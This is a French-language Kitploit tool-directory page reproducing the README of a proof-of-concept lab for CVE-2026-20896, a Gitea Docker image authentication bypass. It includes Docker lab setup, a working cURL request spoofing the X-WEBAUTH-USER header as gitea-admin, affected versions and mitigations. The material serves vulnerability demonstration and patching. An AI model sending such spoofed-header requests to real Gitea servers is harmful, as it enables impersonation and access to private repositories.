Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-20896 — Lab de preuve de concept et scripts Python/cURL démontrant CVE-2026-20896, un contournement d'authentification dans les images Docker officielles de Gitea via l'en-tête X-WEBAUTH-USER. | Kitploit
Outils/GitHubGitHub/yym8538/cve-2026-20896
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionAuthentificationLabs et Pratique
GitHubyym8538/cve-2026-20896

CVE-2026-20896

Lab de preuve de concept et scripts Python/cURL démontrant CVE-2026-20896, un contournement d'authentification dans les images Docker officielles de Gitea via l'en-tête X-WEBAUTH-USER.

1il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

CVE-2026-20896 : Contournement d'authentification de l'image Docker Gitea PoC

[!WARNING] N'utilisez ce PoC que dans un laboratoire local ou contre un système que vous êtes explicitement autorisé à tester.

https://github.com/user-attachments/assets/b73af2fe-0e59-438b-80d6-be93fd75697b

Aperçu

CVE-2026-20896 est un contournement d'authentification dans les images Docker officielles Gitea affectées. Lorsque l'authentification par proxy inverse est activée, le paramètre REVERSE_PROXY_TRUSTED_PROXIES = * généré par l'image permet à un client capable d'atteindre le backend Gitea d'usurper l'identité d'un utilisateur existant via l'en-tête X-WEBAUTH-USER.

Le laboratoire crée un administrateur nommé gitea-admin avec un mot de passe aléatoire et stocke CVE-2026-20896_AUTH_BYPASS_CONFIRMED dans le dépôt privé gitea-admin/private-proof. La lecture de ce fichier sans connaître le mot de passe administrateur aléatoire démontre le contournement.

Versions affectées

CatégorieVersion
VulnérableImages Docker officielles gitea/gitea ≤ 1.26.2
Première version corrigée1.26.3
Recommandée1.26.4 ou ultérieure

La configuration vulnérable nécessite que l'authentification par proxy inverse soit activée et que le backend Gitea soit directement accessible, ou qu'un proxy en amont préserve l'en-tête d'identité fourni par l'attaquant. Un conteneur de proxy inverse n'est pas nécessaire pour cette reproduction locale.

Environnement

# build
docker build -t cve-2026-20896-gitea-vuln .

# run
docker run -d --rm --name cve-2026-20896-gitea-vuln -p 127.0.0.1:3000:3000 cve-2026-20896-gitea-vuln

Attendez quelques secondes que Gitea et le dépôt de preuve privé s'initialisent.

PoC

cURL

curl -s -L -H "X-WEBAUTH-USER: gitea-admin" http://127.0.0.1:3000/gitea-admin/private-proof/raw/branch/main/proof.txt

Une exploitation réussie renvoie CVE-2026-20896_AUTH_BYPASS_CONFIRMED.

Python

python poc.py http://127.0.0.1:3000

Le script compare les requêtes non authentifiées, non administrateur et administrateur falsifiées et affiche VULNERABLE lorsque le contournement d'autorisation est confirmé. Il nécessite Python 3.10 ou ultérieur et n'utilise que la bibliothèque standard.

Impact

  • Usurpation d'identité d'utilisateurs Gitea connus ou devinables
  • Accès non autorisé aux dépôts privés et aux ressources des utilisateurs
  • Actions administratives lorsqu'un compte administrateur est usurpé

Atténuation

  • Mettez à niveau vers Gitea 1.26.3 ou ultérieur ; 1.26.4 ou ultérieur est recommandé.
  • Restreignez REVERSE_PROXY_TRUSTED_PROXIES aux adresses de proxy de confiance.
  • Empêchez l'accès direct au backend Gitea et écrasez les en-têtes d'identité fournis de l'extérieur.
  • Désactivez l'authentification par proxy inverse lorsqu'elle n'est pas nécessaire.

Nettoyage

docker stop cve-2026-20896-gitea-vuln

Références

  • Avis de sécurité Gitea GHSA-f75j-4cw6-rmx4
  • Annonce de sortie de Gitea 1.26.3 et 1.26.4
  • PR de correction de sécurité Gitea #38151
Télécharger l’outil